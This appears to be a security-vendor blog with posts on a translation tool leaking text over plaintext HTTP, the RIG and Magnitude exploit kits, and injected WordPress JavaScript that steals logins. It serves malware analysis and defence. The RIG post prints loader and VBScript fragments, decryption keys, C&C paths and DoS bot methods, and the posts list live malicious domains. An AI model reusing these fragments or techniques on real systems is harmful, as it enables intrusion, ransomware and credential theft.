Tuesday, May 26, 2015

Machine Translators May Leak Confidential Information

One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.

For cloud services like Enterprise Resource Planning (ERP), Human Resources, Video Conferencing and so on, the confidentiality issues are well understood, but there are exceptions, and machine translation is one of them. When we think of data leaks, we rightly look first to malicious software (worms, viruses, customized zero-days from Advanced Persistent Threats (APTs), etc.) when trying to stop confidential data from leaving a network.

Machine translation tools are an interesting member of the “other” category: legitimate tools that can leak confidential data without any malicious intent on the part of the user or the developer. They range from simple web sites like Youdao (pictured above) or Google Translate, where it is fairly clear that information is leaving the machine, up to integrated desktop applications, where the movement of data is far less obvious.

The Youdao Dictionary application is installed like any other and operates like any other, except that the translation engine is remote and the application sends its lookups in plain text via unencrypted HTTP GETs. Because the translation tool is an application running on the user's PC, the person using it is less likely to realize that information is leaving the machine: it looks as if their computer is doing the translation, not a web site.

In the above dissection of a URL retrieved by the tool, we see the word “information” being queried in the “q” field, but it could just as well be that someone isn't entirely sure what “Лечение герпеса Боба Джонса не будет хорошо” means, highlights it and clicks translate. That act results in the application generating something similar to the plaintext query above, except with that chunk of Russian in the “q” field. The user then learns that the string translates to “Bob Jones' herpes treatment is not going well.” Unfortunately, both the request and the translation travel in plaintext, so anyone able to passively observe the traffic learns the same thing.

The application we use as an example is from Youdao (有道), a major Chinese Internet company that, according to Wikipedia (http://en.wikipedia.org/wiki/Youdao), ships an offline version and a free online version of its translation tool. Through some limited experimentation, Youdao's web site does seem to support the same functionality over encrypted HTTPS. We have observed insecure communication in the wild for versions ranging from 2.2.16 to 5.4.43, but it would be unfair to discuss the tool without looking at the latest version. The latest version of the Youdao tool we could find, version, was downloaded from http://codown.youdao.com/cidian/static/6.3/20141203/YoudaoDict.exe and tested on a Windows 7 machine; there was no significant difference in behavior.

Our test version also uses plaintext HTTP by default and appears to automatically translate whatever word is under the mouse pointer, between Chinese and English, whenever the pointer stops moving. It also has an option where a small button appears that you can click (or hover over) to translate a highlighted piece of text. Having used the program, it is easy to see why this tool is popular with users who need to translate between Chinese and English. In addition to the translation features, it also keeps users from being bored by serving extra advertisements.

What the tool provides in features, it definitely does not provide in security: while it works as intended and does not appear to be up to anything overtly nefarious, it still sends every translation request over unencrypted HTTP to a back-end server where the translation takes place.


The conclusion for customers is simple: translation software might send data to networks and systems outside your realm of control. If it does, then exactly as would be the case for a cloud-based ERP or Human Resources system, it is important to know where the data goes, how it gets there, and that the third parties processing it do so in a manner compatible with your organization's policies and contractual obligations. Because the text to be translated is sent in the clear, anyone on the same network path can read it by sniffing traffic, and that text can range from benign phrases to highly sensitive information.

Questions to which we do not yet have answers, such as whether the automatic translation can be “paused,” whether HTTPS can be enabled through configuration, whether Youdao's privacy policy prevents disclosure, and whether any HTTPS functionality is implemented securely (certificate validation and so on), should be answered before deploying YoudaoDict or similar cloud-based translation tools in a confidential setting. Naturally, we would recommend to Youdao that they at least use HTTPS by default in future releases of their software, given the risk of inadvertently disclosing their users' confidential information.


The following experiment was performed to verify whether traffic is still sent in plaintext HTTP GET requests, as it was in previous versions. The setup is a fake letter being written in Notepad by an associate at the law firm of Nerd, Geek, and Spaz, LLP, who are defending a client who is being sued for some reason…

When the two lines were highlighted, a little blue book popped up and hovering over the book results in a translation being executed. That translation is actually performed on a remote server and the following URL is visited by the software:


For convenience, we look at the same URL after decoding it and converting to pretty-printed JSON (the “vars” object is the parsed query string):

    {
        "username": null,
        "netloc": "dict.youdao.com",
        "vars": {
            "appZengqiang": "0",
            "vendor": "unknown",
            "fytype": "AUTO",
            "keyfrom": "deskdict.screentrans.http.0.stroke",
            "dogVersion": "1.0",
            "pos": "-1",
            "doctype": "xml",
            "q": "Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise",
            "le": "eng",
            "appVer": "",
            "client": "deskdict",
            "in": "YoudaoDict",
            "xmlVersion": "3.2",
            "proc": "notepad.exe",
            "id": "8bba3b7bdf465c61b",
            "scrfrom": "stroke"
        },
        "fragment": "",
        "scheme": "http",
        "hostname": "dict.youdao.com",
        "params": "",
        "query": "keyfrom=deskdict.screentrans.http.0.stroke&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer=",
        "path": "/fsearch",
        "password": null,
        "port": null
    }

The JSON version breaks the variables apart so they are easier to read, and the sentence from our screenshot is clearly visible with “%20” replacing the spaces and “%0D%0A” replacing the line break. When decoded, the result is:

Bill Jones is getting sued for some really embarassing
porn that was found on his work computer.  Please advise

This is the exact content of the highlighted region of the Notepad window. Clearly, the fact that the firm cannot spell “embarassing” correctly could put some egg on their face, making this a potentially very damaging leak. The tool also passes information about the application the translated text came from (“proc”, here notepad.exe), version numbers, a client identifier (“id”), affiliate identifiers (presumably so that companies distributing the program can share in ad revenue), and other miscellaneous information.
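As an added example (not code from the post or from Youdao), here is a small Python checker that parses URLs of the kind shown above out of a proxy log, flags lookups that went to the translation endpoint over plain http, and decodes the text that left the machine together with the process it came from. The log lines are constructed for the example; only the dict.youdao.com /fsearch endpoint and its parameter names are taken from the capture above.

```python
"""Spot plaintext machine-translation lookups in proxy-log URLs.

Added example, not code from the original post. It parses the kind of
dict.youdao.com /fsearch URL shown above and flags any request that carries a
translation query ('q') over plain http, reporting the leaked text and the
source process ('proc'). The log lines below are constructed for the example.
"""
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Hosts/paths known to carry translation queries in the clear (from the post);
# extend this table with whatever your own captures show.
TRANSLATION_ENDPOINTS = {
    ("dict.youdao.com", "/fsearch"),
}

# Constructed sample of proxy-log URLs (hypothetical, for illustration only).
SAMPLE_LOG = [
    "http://dict.youdao.com/fsearch?keyfrom=deskdict.screentrans.http.0.stroke"
    "&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0A"
    "porn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise"
    "&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict"
    "&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer=&proc=notepad.exe",
    "https://dict.youdao.com/fsearch?q=information&client=deskdict&proc=winword.exe",
    "http://www.example.com/index.html",
    "http://dict.youdao.com/fsearch?q=%D0%9B%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D0%B5&proc=outlook.exe",
]


def parse_translation_request(url: str) -> Optional[dict]:
    """Return the interesting fields of a translation lookup, or None if the
    URL is not a known translation endpoint."""
    parts = urlsplit(url)
    if (parts.hostname, parts.path) not in TRANSLATION_ENDPOINTS:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already percent-decodes, so %20 -> ' ' and %0D%0A -> '\r\n'.
    return {
        "scheme": parts.scheme,
        "host": parts.hostname,
        "path": parts.path,
        "query_text": qs.get("q", [""])[0],
        "proc": qs.get("proc", ["?"])[0],
        "client_id": qs.get("id", [""])[0],
    }


def find_plaintext_leaks(log_lines):
    """Return (proc, leaked_text, client_id) for every cleartext translation request.
    HTTPS lookups to the same endpoint are not reported: they still leave the
    network, but they are not readable by a passive observer."""
    leaks = []
    for line in log_lines:
        req = parse_translation_request(line.strip())
        if req and req["scheme"] == "http" and req["query_text"]:
            leaks.append((req["proc"], req["query_text"], req["client_id"]))
    return leaks


if __name__ == "__main__":
    for proc, text, cid in find_plaintext_leaks(SAMPLE_LOG):
        print(f"[leak] {proc} id={cid!r} sent in clear: {text!r}")
```

Feed it the URL column of your proxy or IDS export; the https lookup in the sample is deliberately left unflagged so the output separates “readable on the wire” from “left the organisation”, which is the distinction the policy question above turns on.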

Wednesday, May 20, 2015

RIG Exploit Kit Infection Cycle Analysis


Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.


In the past, RIG used malvertising and compromised sites to send users to RIG landing pages and we've seen no change in this tactic. Compromised sites leading to RIG usually contain an iframe in the page header that loads a RIG proxy domain, which also contains an iframe leading to the RIG landing page. The full infection cycle is shown in the annotated Fiddler session below.

Fig 1: RIG Infection Cycle

In this example, the compromised site actually contains three different malicious iframes in its header. These iframes correspond to line items 37-39 in Fig 1.

Fig 2: iframes on Compromised Site

Out of the three RIG proxy iframes on the compromised site, only one, sunfuji[.]com, is still redirecting victims to RIG landing pages. Much like the iframe on the compromised site, the RIG proxy page contains an iframe redirecting victims to the actual landing page.

Fig 3: RIG Proxy Redirects to RIG Landing

Note that the RIG proxy is a persistent redirector whose target changes over time. Taken at a different time, the same proxy page returned a different landing page:

Fig 4: RIG Proxy Changed Landing Page

Landing Page

The landing page has several consistent attributes, starting with the URI. Every RIG landing page URI begins with a question mark followed by 171 characters: a short parameter name, “=”, and a long value. Two examples are below; note that the two values share a long common prefix and the same final characters, which is easier to match on than the hostnames, which change:
  • four.pavementexpress[.]org/?xH6Af7ieJRvHDIs=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWBrxaIYwMU95LEQOdviwijm7VFJMonk0DRvWcDnrtMU0gbrA
  • trip.slotsbid[.]com/?xniKfredKx_HCYY=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWAqBHbYw1MrcOTEOcz0Aj2yeVBd892zxWA4GMBmL5MVUgbrA
The landing page itself contains three blocks of obfuscated code along with some portions of text from a popular CNET article. The majority of the code is actually a long list of character-delimited strings that are passed to a function that basically splits them on the delimiter and runs 'fromCharCode':

Fig 5: Top of the RIG Landing Page - strings use 't' delimiter

The decode function for each of the three code blocks immediately follows the set of character-delimited strings, as shown in Fig 6.

Fig 6: Decode function for first set of character-delimited strings
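To make the string encoding concrete, here is an added Python deobfuscator for this scheme (not the kit's code and not from the post): it finds quoted strings of decimal character codes separated by a single letter, infers the delimiter rather than assuming 't', and rebuilds the text the way the page's split-and-fromCharCode routine does. The sample page and its strings are constructed.

```python
"""Decode delimiter-separated character-code strings of the kind RIG uses.

Added example, not the kit's code. The landing page stores its payload as
long strings of decimal character codes separated by a single letter ('t' in
Fig 5) and rebuilds them with split() plus fromCharCode. decode_charcode_string
does the same offline, inferring the delimiter as the one non-digit character
in the string, so it also handles blocks that use a different letter. The
sample page below is constructed.
"""
import re


def decode_charcode_string(s):
    """Return (delimiter, decoded_text), or (None, None) if s is not of that form."""
    non_digits = set(s) - set("0123456789")
    if len(non_digits) != 1:
        return None, None
    delim = non_digits.pop()
    parts = [p for p in s.split(delim) if p]
    if not parts or any(int(p) > 0x10FFFF for p in parts):
        return None, None
    return delim, "".join(chr(int(p)) for p in parts)


# A quoted run of digits with at least one single-letter delimiter in it.
QUOTED_RE = re.compile(r"""(['"])(\d+(?:[A-Za-z]\d+)+)\1""")


def decode_landing_page(html):
    """Find every quoted charcode string in html; return a list of (delim, text)."""
    results = []
    for m in QUOTED_RE.finditer(html):
        delim, text = decode_charcode_string(m.group(2))
        if text is not None:
            results.append((delim, text))
    return results


def encode_charcode_string(text, delim="t"):
    """Inverse of the decoder; used only to build the constructed sample below."""
    return delim.join(str(ord(c)) for c in text)


# Constructed stand-in for a landing page: two 't'-delimited blocks and one
# that uses 'z', so the delimiter inference is exercised.
SAMPLE_PAGE = (
    "<script>var a='" + encode_charcode_string("VMware", "t") + "';"
    "var b='" + encode_charcode_string("navigator.plugins", "t") + "';"
    "var c=\"" + encode_charcode_string("execScript", "z") + "\";</script>"
)

if __name__ == "__main__":
    for delim, text in decode_landing_page(SAMPLE_PAGE):
        print(f"delimiter {delim!r}: {text!r}")
```

Run it over a saved landing page and grep the output for the strings the post describes (VM product names in block 1, the base64 VBScript in block 2) before bothering with the decode function itself.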

The deobfuscated first block of code attempts to detect known virtual machine characteristics and other attributes that might indicate an analysis environment. If anything is found, the next two code blocks are not deobfuscated or executed.

Fig 7: Code block 1 deobfuscated - detect analysis environment

The second code block is a large base64-encoded VBScript segment:

Fig 8: Code block 2 deobfuscated - vbscript

The VBScript is executed from the following code:

    function time() {
        window.execScript(base64_decode(scriptvar), "VBscript");
    }
    setTimeout(time, 3001);

Once executed, the VBScript exploits CVE-2014-6332, the so-called 'Godmode' exploit (VT detection - 4/57). AV detection tends to be particularly bad on the VBScript even though the code very closely matches the proof of concept originally publicized. There is a good writeup from TrendMicro, which delves into the details of this vulnerability. If exploitation is successful, the encrypted exe is downloaded, decrypted, and executed on the system. The encryption key for the binary is conveniently in cleartext within the VBScript:

      If objHTTP.Status = 200 Then  
           Set objFile = objFSO.CreateTextFile(strSaveTo,True)  
           objFile.Write EnDeCrypt(ByteArray2String(objHTTP.responseBody), "nkiOaWsg")  
      End If  

The third block of code simply serves up a malicious SWF with no secondary obfuscation:

Fig 9: Code block 3 deobfuscated - malicious SWF

This code is almost the same as in other exploit kits, and the URL of the encrypted binary is passed to the SWF as a parameter. The exploit in this case was CVE-2015-0313, which affects Flash Player versions prior to the patched release, and the exploit code is contained in a script called 'wow.' Detection on VirusTotal is 10/57, and there are several public writeups on this vulnerability.

Payload #1 - Injector

The binary payload is encrypted with an 8-byte key, which you can guess from the stream (the first bytes of a PE file are predictable, so XORing them against the ciphertext gives the key) or retrieve from the deobfuscated VBScript. The key read off the stream in Fig 10, 'WsgnkiOa', is the same eight bytes as the VBScript's 'nkiOaWsg' starting from a different offset, which is what you get when you start reading a repeating key part-way through.

Fig 10: Encrypted Binary - key is 'WsgnkiOa'

VirusTotal detection is a bit better than 50% for this payload at 32/57. The binary file is a Nullsoft Installer self-extracting archive and extracting the archive reveals three files inside:

Fig 11: Extracted Files from EXE

In addition to these three files, another executable 'b8.exe' is dropped. Once the installer finishes dropping files, it loads the DLL (15/55 on VirusTotal) and begins executing functions to read in the other two files. The file '6ag1rqashtwqw1hgqa' contains data XOR'd with the first 10 bytes of the filename, and the decrypted contents reveals several API calls that give us an idea of what will happen next, for example CreateProcessA, WriteProcessMemory, and ResumeThread.

Fig 12: Decrypting file data with filename

Similarly, the 'Stevie Nicks' .m3u is unfortunately not actually a playlist, but instead an encrypted binary that is decrypted by the DLL using the XOR key "ZhmGqqKwXmJiiS7dzjzPyyaTw0PANF".

Fig 13: Decrypting 'Stevie Nicks' playlist binary
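The three XOR steps above (recovering the 8-byte key of the downloaded binary, the filename-derived key for '6ag1rqashtwqw1hgqa', and the fixed key for the 'Stevie Nicks' file) are all the same operation. The following added Python is an illustration of that technique and not the kit's own routine: the post does not print EnDeCrypt, so the assumption here is a plain repeating-key XOR aligned to file offset 0, which is what “guess the key from the stream” implies. All sample bytes are constructed.

```python
"""Repeating-key XOR as used for the RIG payload stages discussed above.

Added example (not the kit's code, not the post's code). It covers two steps
the post describes: recovering the 8-byte key of the downloaded binary from a
known plaintext at the start of the stream, and XOR-decoding a dropped file
with a key derived from its own filename. Assumption: the data is encoded with
a plain repeating-key XOR aligned to offset 0. All sample bytes are constructed.
"""


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated; the operation is its own inverse."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# First eight bytes of a typical PE file: 'MZ' plus the usual e_cblp/e_cp values.
PE_KNOWN_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00"


def recover_key(ciphertext: bytes, known_prefix: bytes = PE_KNOWN_PREFIX) -> bytes:
    """Known-plaintext recovery: key[i] = ct[i] ^ pt[i] over the known prefix.
    Works when the key length equals len(known_prefix) and the key starts at offset 0."""
    if len(ciphertext) < len(known_prefix):
        raise ValueError("ciphertext shorter than the known prefix")
    return xor_repeat(ciphertext[: len(known_prefix)], known_prefix)


def rotate(key: bytes, n: int) -> bytes:
    """The key as it appears when you start reading the stream at offset n
    (e.g. 'nkiOaWsg' seen from offset 5 is 'WsgnkiOa', as in Fig 10)."""
    n %= len(key)
    return key[n:] + key[:n]


def filename_key(dropped_name: str, n: int = 10) -> bytes:
    """Key for the Nullsoft-dropped data file: the first n bytes of its own name."""
    return dropped_name.encode("ascii")[:n]


# --- constructed demo data -------------------------------------------------
DEMO_KEY = b"nkiOaWsg"
DEMO_PLAINTEXT = (PE_KNOWN_PREFIX + b"\x04\x00\x00\x00\xff\xff\x00\x00"
                  + b"This program cannot be run in DOS mode.")
DEMO_CIPHERTEXT = xor_repeat(DEMO_PLAINTEXT, DEMO_KEY)  # stands in for the downloaded blob

DROPPED_NAME = "6ag1rqashtwqw1hgqa"
DROPPED_PLAINTEXT = b"CreateProcessA\x00WriteProcessMemory\x00ResumeThread\x00"
DROPPED_CIPHERTEXT = xor_repeat(DROPPED_PLAINTEXT, filename_key(DROPPED_NAME))


def demo():
    """Recover the stream key, decrypt the blob, and decode the dropped file."""
    key = recover_key(DEMO_CIPHERTEXT)
    decrypted = xor_repeat(DEMO_CIPHERTEXT, key)
    api_names = xor_repeat(DROPPED_CIPHERTEXT, filename_key(DROPPED_NAME)).split(b"\x00")
    return key, decrypted, api_names


if __name__ == "__main__":
    key, dec, apis = demo()
    print("recovered key:", key, "as seen from offset 5:", rotate(key, 5))
    print("decrypted head:", dec[:2], dec[16:])
    print("dropped file strings:", [a.decode() for a in apis if a])
```

If the recovered key does not decrypt to a clean DOS stub, the two things to try first are a different known prefix (the e_cblp/e_cp values vary between linkers) and the possibility that the kit's routine is not a plain XOR at all.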

VirusTotal detection on the decrypted Stevie Nicks binary is 35/56.  Ultimately, this leads to creating a hollow process of itself (process hollowing - PDF) which then creates an explorer.exe process and injects code to beacon to the Command & Control (C&C) server. Beacons were frequent and used the URI string '/power/logout.php' to POST to the domain 'starpowerss.com'

Fig 14: C&C Traffic Sample

Other notable activity includes:
  • Copying to 'C:\Program Files\Common Files\Windows Search 5.3.10\<random>.exe'
  • Using the registry for persistence
  • Hooking ZwOpenFile and ZwOpenProcess
  • Clipboard control

Payload #2 - Blue Bot

After quite some time, a second payload named 'cfajrs.exe' is downloaded from 'a.pomf.se'. Four C&C URIs were observed in its beacons:
  • /help/proxy
  • /help/blog
  • /help/botlogger.php
    • Returns div of HTML with "visitors online" (see Fig 15)
  • /help/target
    • Returns 'STOP|STOP|STOP' during analysis (see Fig 16)

Fig 15: /help/botlogger.php response

Fig 16: /help/target response

VirusTotal detection is 41/56 and indicates this is part of BlueBotnet. Looking at the binary, we see it is a .NET executable that uses no obfuscation at all, so decompilation is straightforward. The namespace and class names confirm it is called 'Blue_Botnet', and it appears to be a DoS tool.

Fig 17: Blue_Botnet Code Overview

One of the more interesting functions is the 'updateTarget' function, which expects a pipe-delimited list of IP, port, and method. There are multiple different methods accepted for the 'target' command: UDP, TCP, SYN, MCBOTALPHA, HTTP, HTTPROXY, PRESS, and STOP.

Fig 18: Blue_Botnet updateTarget Function

To perform its attacks, the bot has a list of 37 different user agent strings to make detection more difficult (paste of user agents); each request uses a different user agent from the list so requests look like they are coming from multiple different clients instead of from the same source. There is an Italian-language theme to the code, both in some of the variable names and in some of the HTTP headers, for example the Accept-Language header in the HTTP attack function shown below.

Fig 19: Blue_Botnet HTTP Attack Function

Interestingly, the response from botlogger.php is not used in the code and the request may simply be a beacon to the server to keep count of infections.


RIG continues to be a popular and effective exploit kit choice and has evolved over the past year, indicating active development. While other exploit kits are moving toward ransomware and adfraud for monetization of infected victims, RIG is apparently not following this trend and still pushes more traditional malware. ThreatLabZ will continue to monitor RIG for any new developments. For a look at the infrastructure supporting RIG, Trustwave has a great post on the topic.

Monday, May 18, 2015

Magnitude Exploit Kit leading to Ransomware via Malvertising

Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system.  This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks.

We recently found a number of compromised pages following the structure of fake search engine pages. The following sites have been seen to redirect to malicious content:

  • hymedoraw[dot]com/search[dot]php
  • awerdeall[dot]com/search[dot]php
  • index-html[dot]com/
  • joomla-green[dot]com/
  • bestcool-search[dot]com/
  • joyo-search[dot]com/
  • megas-search[dot]com/
  • speeds-search[dot]com/
  • sample-data[dot]com/
  • lazy-summer[dot]com/
  • tundra-search[dot]com/
  • death-tostock[dot]com/
  • adoncorst[dot]com/search[dot]php
  • demo-content[dot]com/
  • enable-bootstrap[dot]com/
  • rospecoey[dot]com/search[dot]php
  • aranfleds[dot]com
  • malpithia[dot]com/search[dot]php
  • noutademn[dot]com/search[dot]php
We've also seen a high volume of malvertising activity leading to Magnitude Exploit Kit hosting sites. The biggest source of this malvertising activity is "click2.systemaffiliate.com", operated by the ad network Sunlight Media, as seen in the list below (each ad-network URL is followed by the Magnitude landing URL it led to):
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=Area+Rugs+Cleaning+hotels+for+sale+by+owner
    • b7b6o[dot]y2ff[dot]3b1f767u[dot]dc[dot]3d478d[dot]t97a2as[dot]pdf0q[dot]zf1[dot]eaq6907579[dot]hatentries[dot]in/?17657271747b7e747c2539646e6463727a7671717e7b7e7663723974787a
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=backhoes+for+sale+Granite+Counter+Tops
    • nd4e61i[dot]0fedz[dot]i9390[dot]11f[dot]b8e0[dot]c1i[dot]51aa8a5x[dot]b22n[dot]z1037n6z[dot]rulesreturning[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=direct+tv+dallas+tx+financial+services+companies
    • kfb39c[dot]ec526[dot]k149t[dot]13f44d[dot]gfb9820[dot]q5c[dot]c778eg[dot]c47b0v3diz2[dot]backedmisuse[dot]in/?1567707376797c767e273b666c666170787473737c797c7461703b767a78
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=business+processes+management+Metaire+Construction+Management+Service
    • a19602cr[dot]773a9be[dot]bd407edi[dot]m602f890[dot]wfd6b[dot]eay836h7h[dot]bytessounds[dot]in/?3a485f5c595653595108144943494e5f575b5c5c5356535b4e5f14595557
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=michelin+tire+Shingle+Roofer
    • 0eeda91z[dot]w8cb575d[dot]b8[dot]s247[dot]maf35794i[dot]q9b[dot]yc79p[dot]b[dot]y7siiy61xy[dot]bytessounds[dot]in/?295b4c4f4a45404a421b075a505a5d4c44484f4f404540485d4c074a4644
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=compact+suv+internet+hosting+company
    • u0b49r[dot]b9l[dot]r76783b2i[dot]ce01s[dot]k25o[dot]8f3t[dot]w32[dot]1d1dl[dot]u63g[dot]s45t[dot]xk6z4x0ok4[dot]isessentially[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=hotel+prices+Air+Duct+Cleaning+Service
    • za46[dot]1375623[dot]e53cb4[dot]2014[dot]50ebd[dot]t1c06f[dot]61[dot]y7f8vkub0[dot]safelyinstall[dot]in/?16647370757a7f757d2438656f6562737b7770707f7a7f7762733875797b
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=supercuts+coupons+sales+presentation+equipment
    • 01e717[dot]i06917c[dot]36f5[dot]j056[dot]m66a[dot]176f3f[dot]5ej[dot]p6e[dot]h2xb793w17[dot]safelyinstall[dot]in/?285a4d4e4b44414b431a065b515b5c4d45494e4e414441495c4d064b4745
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=free+latest+accounting+software+Laptops
    • of62b8a[dot]x43f292x[dot]a674q[dot]r5ec03a[dot]y01c9b[dot]f7367u[dot]cgh63008[dot]husbandhides[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=marine+equipment+and+supply+company+real+esate+hotline
    •  g1812c47[dot]t6060f09l[dot]t74711a[dot]m69131[dot]l88[dot]z874f0h[dot]b88z8j4s31ji[dot]husbandhides[dot]in/?2b594e4d484742484019055852585f4e464a4d4d4247424a5f4e05484446
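The 60-hex-character query strings on the landing URLs above are not random. As an added example (not code from the post), the Python below treats the first byte of each as a single-byte XOR key and XORs the remaining bytes with it; applied to the four queries quoted from the list, every one decodes to the same short ASCII tag naming the ad-network host that referred the visitor. The scheme was inferred from the strings on this page, so treat it as an observation about this campaign rather than a documented Magnitude feature.

```python
"""Decode the query strings on the Magnitude landing URLs listed above.

Added example, not part of the original post. Each landing URL ends in a
60-hex-character query. Treating the first byte as a single-byte XOR key and
XORing every following byte with it turns the strings above into a short
ASCII tag. The checks (all-hex input, printable output) are how you would
confirm the guess on new samples before trusting it.
"""
import string
from typing import Optional

PRINTABLE = set(string.printable.encode())


def decode_landing_query(query: str) -> Optional[str]:
    """Return the decoded ASCII tag, or None if the query does not fit the scheme."""
    if len(query) % 2 or not all(c in string.hexdigits for c in query):
        return None
    raw = bytes.fromhex(query)
    if len(raw) < 2:
        return None
    key, body = raw[0], raw[1:]            # first byte is the key
    plain = bytes(b ^ key for b in body)   # rest is plaintext XOR key
    if any(b not in PRINTABLE for b in plain):
        return None
    return plain.decode("ascii")


# Queries copied from the landing URLs in the list above.
LANDING_QUERIES = [
    "17657271747b7e747c2539646e6463727a7671717e7b7e7663723974787a",
    "3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052",
    "1567707376797c767e273b666c666170787473737c797c7461703b767a78",
    "295b4c4f4a45404a421b075a505a5d4c44484f4f404540485d4c074a4644",
]


def decode_all(queries=LANDING_QUERIES) -> dict:
    """Map each query to its decoded tag (None where the scheme does not fit)."""
    return {q: decode_landing_query(q) for q in queries}


if __name__ == "__main__":
    for q, tag in decode_all().items():
        print(f"{q[:12]}...  key=0x{q[:2]}  ->  {tag!r}")
```

Because the key is carried in the first byte, the same referrer produces a different-looking query every time the key changes, which is why simple string matching on the query fails while a decode-then-match rule does not.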
The Malvertising networks lead to redirector domains utilizing 302 cushioning. Our recent data shows the following redirector domains to have been heavily utilized:

  • paypal-invest[.]net
  • paypal-invest[.]info
  • paypal-invest[.]biz

Following the 302 redirect, Magnitude delivers both a malicious Flash payload and a highly obfuscated JavaScript payload (MS13-009, the Microsoft Internet Explorer COALineDashStyleArray integer overflow exploit). Once the browser has been exploited, Magnitude proceeds to a new step in the infection cycle: where the malware payload would previously have been downloaded immediately after exploitation, we now see a shellcode payload being served.

Shellcode being served

The shellcode is a simple payload that utilizes the Windows library ‘urlmon.dll’ to attempt to fetch a list of URLs contained within the shellcode. In the cases we have seen so far, only the first URL results in a payload (CryptoWall 3.0), while the others return no data.

CryptoWall payload download

This is a highly profitable ransomware payload that leverages Bitcoin transactions executed over the Tor anonymity network to monetize the attack. Threat actors use this method of collection because it cannot be reliably traced back to them. Victims are especially vulnerable to this type of extortion since very few people seem to back up their critical files such as documents and pictures.

CryptoWall decryption instruction

ThreatLabZ has been actively monitoring this Magnitude EK activity and the image below illustrates the transactions we saw for this campaign:

The Green represents Payload activity; The Blue represents Landing Page activity.

As with most threat actors, once they find a hosting location that allows them to run their attacks they tend to stick with it. The lion's share of the hosting IPs seen in our research are in Germany, making it the biggest hosting location for this activity.

Other countries seen to host this activity: NL (3%) US(2%) JP(2%)

Exploit kits are evolving to bypass standard security solutions that rely on basic URL filtering. Attackers use various methods of infection, including malvertising and iframe injection on compromised pages. Ransomware is highly profitable, recording up to $33,000 per day at one point. The sophistication of these attacks is on the rise and security leaders need to keep apprised of this maturing illegal market.

Analysis done by Edward Miles & Chris Mannon

Thursday, May 7, 2015

Compromised WordPress sites leaking credentials

Zscaler recently observed a credential-leak campaign on multiple WordPress sites. The compromised sites run backdoor code that activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. So far we have identified only one domain, "conyouse.com", collecting the credentials from these compromised sites.

The following is a sample list of WordPress websites compromised through this campaign:
  •  shoneekapoor.com
  •  dwaynefrancis.com
  •  blissfields.co.uk
  •  avalineholding.com
  •  attherighttime.net
  •  bolsaemprego.ne
  •  capitaltrill.com
  •  blowdrybar.es
  •  espada.co.uk
  •  technograte.com
  •  socalhistory.org
  •  glasgowcontemporarychoir.com
  •  sombornefp.co.uk
  •  reciclaconloscincosentidos.com
  •  testrmb.com
  •  digivelum.com
  •  laflordelys.com

Credential Leakage

When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page. Below, we walk through the full exploit cycle illustrating how the user credentials are being stolen through this campaign.

Compromised WordPress login page

As part of the WordPress login page, the user is getting served malicious information stealing JavaScript code hosted on “conyouse[.]com”. The obfuscated JavaScript code present in “wp.js” file can be seen here:
Information stealing JavaScript code

The variable “_0xdd75” stores a list of strings which are used dynamically in the JavaScript above.

List of encoded strings
This code is triggered when the user submits their credentials on the login page of the WordPress site.
The form containing the username and password input boxes has the fixed name “loginform” on every WordPress site. The script registers a submit handler on that form, calls preventDefault to cancel the normal submission, and instead runs the alternate code present in this file: the login fields are serialised and the resulting string is Base64-encoded.

Information Stealing JavaScript code

The final data is sent to "conyouse[.]com/scr.js", which is statically stored as one of the strings. The final GET request generated is as shown in the traffic:

GET Request relaying stolen credentials

